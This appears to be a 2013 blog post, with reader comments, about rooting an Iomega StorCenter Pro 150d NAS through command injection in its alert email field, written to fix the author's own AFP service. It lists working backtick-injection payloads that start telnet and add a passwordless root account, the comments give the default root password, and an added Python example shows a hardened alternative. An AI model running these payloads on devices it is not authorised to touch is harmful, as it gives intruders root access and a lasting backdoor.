Monday, September 2, 2013

Hacking the Iomega StorCenter Pro 150d NAS

The StorCenter Pro 150d is a circa 2007 network-attached storage device (NAS) from Iomega which, frustratingly, does not provide shell access.

I had a problem with AFP (Apple Filing Protocol) not working but managed to get root access to fix it (turned out to be an orphaned pid file which wasn't being removed on boot, and which was preventing the service from starting).

The 150d has a vulnerability in how it handles email addresses within the alerts interface:

Screenshot of the StorCenter Pro 150d's Alerts Interface

You can append any arbitrary command between backticks and it will be dutifully executed as root when you click the "Send Test Mail" button.
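The behaviour described above is what happens when a form field is pasted into a shell command line. The following is an added example, not the NAS firmware's code (which this page does not show): it contrasts that assumed pattern with a validated, shell-free call. The `echo` mailer stand-in, the function names and the sample address are constructed for illustration.

```python
import re
import subprocess

# Allow-list for the address field: starts alphanumeric (so it cannot be read
# as an option) and admits no whitespace, quotes, backticks, '$', ';' or '|'.
ADDRESS_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

# Assumption: 'echo' stands in for the device's mailer, so nothing is sent.
MAILER = "echo"
PREFIX = "sending test mail to"


def send_test_mail_vulnerable(address: str) -> str:
    """Assumed 'before' pattern: the field is pasted into a shell command."""
    # /bin/sh performs command substitution on anything between backticks
    # before the mailer ever sees the address.
    done = subprocess.run(f"{MAILER} {PREFIX} {address}", shell=True,
                          capture_output=True, text=True)
    return done.stdout.strip()


def run_mailer_argv(address: str) -> str:
    """Pass the address as a single argv element; no shell parses it."""
    done = subprocess.run([MAILER, PREFIX, address],
                          capture_output=True, text=True, check=True)
    return done.stdout.strip()


def send_test_mail_hardened(address: str) -> str:
    """Validate against the allow-list, then call the mailer without a shell."""
    if not ADDRESS_RE.fullmatch(address):
        raise ValueError("address field rejected")
    return run_mailer_argv(address)


if __name__ == "__main__":
    # Constructed input: a harmless marker command between backticks.
    sample = "null@example.invalid`echo INJECTED`"
    print(send_test_mail_vulnerable(sample))  # marker command was executed
    print(run_mailer_argv(sample))            # backticks stay literal text
    try:
        send_test_mail_hardened(sample)
    except ValueError as err:
        print("hardened:", err)
```

Either layer alone stops the substitution; using both means a later change that reintroduces a shell still sees only allow-listed input.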

It turns out that the StorCenter Pro 150d has a telnet daemon available through inetd. So all we need to do is start that, add a passwordless root account, and we can pop right in.

Here are the commands that worked for me, but use them at your own risk. Click "Send Test Mail" after entering each one. The null@[] address is arbitrary -- any email address should work there.

UPDATE: See the comment from @George Kopf below. Apparently the default root password is simply the number '1', so you probably don't need to create the additional account. Just start the telnet daemon and try logging in as user 'root' with password '1'.

null@[]`mount -t devpts devpts /dev/pts >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`nohup /bin/inetd /etc/inetd.conf >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`echo 'root2::0:0:administrator:/mnt/0:/bin/sh' >>/etc/passwd`

If you have the /public share of your NAS mounted somewhere, you can watch the hacknas.log file to see any error messages.

Once done, you should be able to telnet in:

$ telnet nas
Connected to
Escape character is '^]'.

Linux 2.6.13 (obi) (pts/0)

nas login: root2

BusyBox v1.00 (BUILDTIME) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

-sh: can't access tty; job control turned off
~ #

System info:

# cat /proc/cpuinfo
processor : 0
cpu : e300
revision : 1.1 (pvr 8083 0011)
bogomips : 263.16
chipset : 8347E
Vendor : Freescale Inc.
Machine : mpc8347E sys
core clock : 396 MHz
bus  clock : 264 MHz
PVR : 0x80830011
SVR : 0x80520011
PLL setting : 0x6
Memory : 256 MB

For reference, here is the Iomega 150d manual.

Thanks to Jim Buzbee for identifying the alert vulnerability, and asysadm for his post on modifying the NFS export options.


Anonymous said...

:-) . Thanks.

Unknown said...

This is brilliant. I used the first two commands to start telnet and then ran cat /etc/passwd >> to the log file.

I used John the Ripper to crack the root password and it was a: 1

The root password is the number one.

mla said...

Seriously? Wow, too funny.

Anonymous said...

I confirm ... password is 1 !!!
Thanks for this hack, works with firmware 85.85
